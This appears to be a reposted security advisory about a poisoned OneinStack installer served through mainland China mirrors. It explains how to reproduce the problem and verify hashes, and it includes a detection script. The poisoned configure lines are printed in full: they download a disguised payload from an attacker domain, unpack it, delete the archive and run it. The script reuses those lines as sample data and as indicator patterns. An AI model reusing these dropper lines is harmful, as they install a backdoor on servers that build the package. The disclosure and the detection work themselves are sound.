OneinStack installation package was poisoned again

888u

Last update: 2024-03-25, edited by 888u

After being poisoned in May, the OneinStack one-click installation package has been poisoned again. What is interesting is that the malicious domain name used here and the one used in the poisoning of the LNMP one-click installation package were registered on the same day.

How to reproduce

(The problem has not been observed when downloading from overseas nodes.)

mirrors.oneinstack.com is a CNAME to seo-one-01.xnsksstack.com. That domain's DNS is hosted at DNSPod and answers differently by region: resolvers in mainland China get a CNAME to mirrors.oneinstack.com.w.cdngslb.com (Alibaba Cloud CDN, which serves the package containing the malicious code), while overseas resolvers get an A record for 47.251.13.6 (an Alibaba Cloud US node).

# On a mainland China machine, or after manually pointing mirrors.oneinstack.com.w.cdngslb.com at a mainland China IP
wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
grep -r "oneinstack.club" pcre-8.45

Result (pcre-8.45/configure line 6883):

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

Verify MD5:

# Malicious package
md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz
# Overseas node package (no such problem has been found yet)
aa55626f6ba9eb8cae2f5a3d9c6c9b96  oneinstack-full.tar.gz

Comparison of the mainland China package against the overseas package (mainland China on the left, overseas on the right). In the mainland package, pcre-8.45/configure downloads the payload disguised as a JPEG, unpacks it into /var/local/, deletes the archive, and runs the dropped binary:

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE
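The steps above (hash the tarball, unpack it, grep the vendored sources) can be turned into a repeatable check. The script below is an added example and is not code from the v2ex post or from the OneinStack project. It assumes that the overseas MD5 quoted above is an acceptable reference value and that the indicator strings are exactly the ones from the grep output; the sample configure files it scans are constructed inline, so it runs offline and never executes the dropped lines.

```shell
#!/bin/sh
# Added example, not code from the v2ex post or from OneinStack: an offline
# check of a downloaded one-click package against the indicators shown above.
# Assumptions (mine, not the post's): the overseas MD5 quoted in the post is
# the reference value, and the indicator strings are those from the grep output.

KNOWN_GOOD_MD5="aa55626f6ba9eb8cae2f5a3d9c6c9b96"

# Indicators seen in the poisoned pcre-8.45/configure. One ERE per line.
IOC_PATTERNS='download\.oneinstack\.club
/var/local/osk\.jpg
/var/local/cron/load'

# Print "ok" if the tarball's MD5 equals the reference, "MISMATCH" otherwise.
check_md5() {
    sum=$(md5sum "$1" | cut -d' ' -f1)
    if [ "$sum" = "$KNOWN_GOOD_MD5" ]; then echo ok; else echo MISMATCH; fi
}

# Print the number of suspicious lines under an extracted source tree:
# every line matching an indicator, plus any configure line that starts with
# wget or curl (autoconf-generated configure scripts never download anything).
scan_tree() {
    hits=0
    while IFS= read -r pat; do
        n=$(grep -rEc -- "$pat" "$1" 2>/dev/null | awk -F: '{s+=$NF} END{print s+0}')
        hits=$((hits + n))
    done <<EOF
$IOC_PATTERNS
EOF
    fetches=$(find "$1" -type f -name configure -exec grep -Ec '^(wget|curl) ' {} + 2>/dev/null \
              | awk -F: '{s+=$NF} END{print s+0}')
    echo $((hits + fetches))
}

# Constructed sample trees for a dry run: "bad" carries the four lines the
# post's grep found, "good" is a clean stub. Nothing in them is executed.
make_sample_tree() {
    mkdir -p "$1/bad/pcre-8.45" "$1/good/pcre-8.45"
    cat > "$1/bad/pcre-8.45/configure" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
rm -f /var/local/osk.jpg
/var/local/cron/load linhkkngf@QWE
ac_cv_prog_CC=gcc
EOF
    cat > "$1/good/pcre-8.45/configure" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
ac_cv_prog_CC=gcc
EOF
}

root=$(mktemp -d)
make_sample_tree "$root"
printf 'bad tree: %s suspicious lines\n' "$(scan_tree "$root/bad")"
printf 'good tree: %s suspicious lines\n' "$(scan_tree "$root/good")"
rm -rf "$root"
```

Two caveats. The MD5 comparison only proves the file matches what one overseas node served at one moment; the post itself says only that the problem "has not been found yet" there, so a stronger reference is the checksum the upstream PCRE project publishes for pcre-8.45.tar.gz, compared against the vendored copy in oneinstack/src. And the wget/curl rule is the more durable signal: the attacker can rotate domains and paths, but a configure script that reaches out to the network is wrong regardless of where it points.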

Related: the lnmp.org incident, and the OneinStack compromise half a year ago (GitHub).

The malicious domain name oneinstack.club was registered on 2023-08-28, matching the registration date and registrar of LNMP's malicious domain name lnmp.life.

Source of this article: https://v2ex.com/t/979226


All copyrights belong to 888u unless otherwise stated.